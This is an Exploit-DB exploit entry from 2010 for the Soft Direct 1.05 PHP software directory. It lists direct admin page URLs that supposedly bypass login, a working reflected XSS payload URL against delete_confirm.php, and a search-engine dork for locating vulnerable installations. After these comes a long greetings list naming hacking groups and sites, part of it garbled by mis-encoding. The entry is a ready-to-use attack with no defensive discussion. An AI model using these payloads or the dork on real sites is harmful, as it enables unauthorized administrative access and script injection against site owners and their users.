Soft Direct 1.05 - Multiple Vulnerabilities

EDB-ID:

11189

CVE:

N/A

EDB Verified:

Author:

indoushka

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-01-18

Vulnerable App: 
========================================================================================                  
| # Title        : Soft Direct v1.05 Multti Vulnerability      
| # Author       : indoushka                                                               
| # email        : indoushka@hotmail.com                                                   
| # Home         : www.iq-ty.com/vb                                                                             
| # Script Home  : http://hotfile.com/dl/23890178/c3b1ee3/SoftDirect.v1.05.rar.html                                                                                                                            
| # Dork         : [ Software Directory Powered by SoftDirec 1.05 ]                                      
| # Tested on    : windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug          : Mullti                                                                    
======================      Exploit By indoushka       =================================
# Exploit  : 
 
 1- By Pass Login
 
 http://127.0.0.1/softdirec/admin/home.php
 
 http://127.0.0.1/softdirec/admin/settings.php
 
 2- XSS
 
http://127.0.0.1/softdirec/library/delete_confirm.php?delete=yes&id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&return=souk%20naamane&type=hacked%20by&catdel=indoushka
 
================================   Dz-Ghost Team   ========================================================
Greetz : ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 + äÇÓ ãÚÓßÑ + äÇÓ ÊíÇÑÊ + äÇÓ ÇáÌáÝÉ + äÇÓ ÇáãÓíáÉ
+ äÇÓ ÊáãÓÇä + äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ + äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ + äÇÓ ÝÇÓ æãßäÇÓ + äÇÓ æåÑÇä
Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com  * Cyb3r IntRue (avengers team) 
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc 
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net
SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com    
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org 
r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net 
------------------------------------------------------------------------------------------------------------
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services